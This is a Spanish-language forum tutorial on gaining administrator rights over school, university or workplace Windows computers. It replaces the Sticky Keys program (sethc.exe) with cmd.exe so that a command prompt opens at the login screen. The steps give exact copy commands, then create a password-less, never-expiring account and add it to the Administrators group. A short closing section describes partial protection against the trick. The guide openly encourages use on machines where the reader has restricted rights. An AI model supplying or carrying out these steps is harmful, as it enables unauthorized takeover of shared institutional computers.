Escalar privilegios Administrador (colegios,U,etc)

Te gustaria escalar a privilegios de administrador de tu maquina en recintos como colegios, Universidades y hasta el mismo trabajo, bueno aqui un manual muy educativo Xd.

Bueno una pequeña introduccion:

Windows tiene una vulnerabilidad en su sistema que hasta el dia de hoy no es solucionada, se trata de stickykeys, este se activa al pulsar 5 veces la tecla shift.
Este tipo de ataque se llama, escalada de privilegios, pues te permite obtener acceso como Administrador a un equipo en el cual tenias derechos restringidos
http://img53.*************/img53/8004/tecladologitechwe0.jpg

Este es Stickykeys, creo que a mas de alguno le ha salido esta ventanita molestosa mientras estamos jugando o realizando alguna actividad que involucre tipear la tecla shift.

Esta ventanita tambien aparece en el inicio de sesion de windows lo cual aprovecharemos en esta vulnerabilidad
http://img522.*************/img522/6840/bienvenidastickykeysjf5.jpg

Bueno ahora realizaremos un pequeño cambio, para que en ves de que aparesca esta molestosa ventanita aparesca el simbolo del sistema[MS-DOS]
[Queda claro que necesitamos acceso fisico al pc]
Vamos a inicio->ejecutar y escribimos "cmd" [sin las comillas]
http://img380.*************/img380/5918/41845640wb9.jpg

Nos aparecera la siguiente ventanita de MS-DOS


Empezaremos a escribir los comandos

1-. Escribimos "cd\" [sin comillas] y pulsamos enter
2-. "cd WINDOWS" [sin comillas] y pulsamos enter
3-. "cd system32" [sin comillas] y pulsamos enter
3-. *copy "c:\WINDOWS\system32\setch.exe" "c:\WINDOWS\system32\backup sethc.exe"* [sin los asteriscos *] y pulsamos enter
4-. *copy "c:\WINDOWS\system32\cmd.exe" "c:\WINDOWS\system32\setch.exe"* [sin los asteriscos *] y pulsamos enter [si nos pide confirmacion ponemos "yes" o "si" dependiendo del SO]
5-. "exit" [sin comillas] y pulsamos enter

Bueno ya tenemos no esta la ventana de stickykeys pero si la de MS-DOS [para verificar tipeen 5 veces shift]
http://img179.*************/img179/4390/sethcexepm9.jpg

Bueno ahora a escalar privilegio de administrador.
Reinicien el sistema.
En la pantalla de bienvenida con las cuentas pulsan 5 veces la tecla shift y aparecera lo anterior

http://img183.*************/img183/6440/administradorgm9.jpg

Ahora crearemos un usuario Admin, para ello introducimos el siguiente comando:
"Net user Elusuarioquequieras /add /expires:never /passwordreq:no" [sin comillas]

Esto nos creara un usuario que en este caso se llamara Elusuarioquequieras, el cual nunca caduca y no requiere de password.

Para darle permisos de Admin al usuario que hemos creado (aunque es muy provable que no lo veas en la pantalla de bienvenida), ejecutamos el siguiente comando:
"Net localgroup Administradores /add Elusuarioquequieras" [sin comillas]

Reiniciamos el PC y ahora si que veremos a nuestro nuevo usuario con permisos de Admin

Protegerse de este fallo

Para protegerse de este fallo de seguridad basta con ir a panel de control, darle a vista clasica y entrar en opciones de accesibilidad, en la pesta?a teclado nos fijamos en el cuadro que pone StickyKeys y le damos a configuracion, dentro de esta ventana desmarcamos la opcion utilizar metodo abreviado, aceptamos y listo, luego nos toca repetir los mismos pasos con Togglekeys y con Filterkeys(aunque esta ultima no termina lanzando la consola desde la pantalla de bienvenida si lo hace desde una cuenta limitada por lo que es mejor desactivar la funcion abreviada para mayor seguridad).
Con esto evitariamos que un usuario ejecute el punto numero 5 de este texto desde una cuenta limitada, pero no evitaremos la ejecucion del mismo punto desde la pantalla de bienvenida, algo que tendria que haber sido corregido hace bastante tiempo.

_____________________________________________________________-